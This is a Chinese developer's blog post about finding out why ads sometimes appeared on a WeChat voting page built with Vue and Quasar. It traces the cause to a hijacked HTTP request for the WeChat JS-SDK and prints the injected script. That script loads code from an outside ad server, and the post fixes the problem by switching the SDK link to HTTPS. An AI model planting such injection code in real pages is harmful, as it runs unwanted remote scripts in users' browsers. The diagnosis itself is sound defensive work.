这几天在做一个微信的投票网页，用的是vue+quasar UI框架，结果这几天发现偶尔上网页后有广告，如下图红色方框

以为自己的虚拟主机被攻击，但反复检查了都感觉没啥问题，然后怀疑是不是quasar这个框架有问题，因为我第一次用这个UI框架，是外国的，看着很正规的，也是反复查了，也没发现什么问题，也不是一直会出现，偶尔才出现一次，我就一直刷新，我先是截了正常时的网络访问状况

不知刷新了多久，终于刷出了广告，看！果然有问题了，jwexin-1.2.0.js这个是微信网页jssdk的文件，可这个为啥下面又重新加载了还带上了参数

我点了第一个jsweixin-1.2.0.js，果然发现了问题了，这就是生成广告的脚本

这是广告js的代码

var _atn_obj_ = new Object; 
_atn_obj_.oldurl = 'http://res.wx.qq.com/open/js/jweixin-1.2.0.js?cHVzaA=1513177208'; 
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7My4PMz8jMzcjKzcrHoMrNzc3Lg7bfxtHO0dLOg82Dy8vPys/Pg86DzsrOzM7IyM3Px4POys7MzsjIzc/Hz8vLzs7IzYPKzcrJyw=='; 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); 
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

到此我的代码没问题，可能就是所谓的dns劫持了

我将微信jssdk引用方式改成https，好像有点效果

<script type='text/javascript' src='https://res.wx.qq.com/open/js/jweixin-1.2.0.js'></script>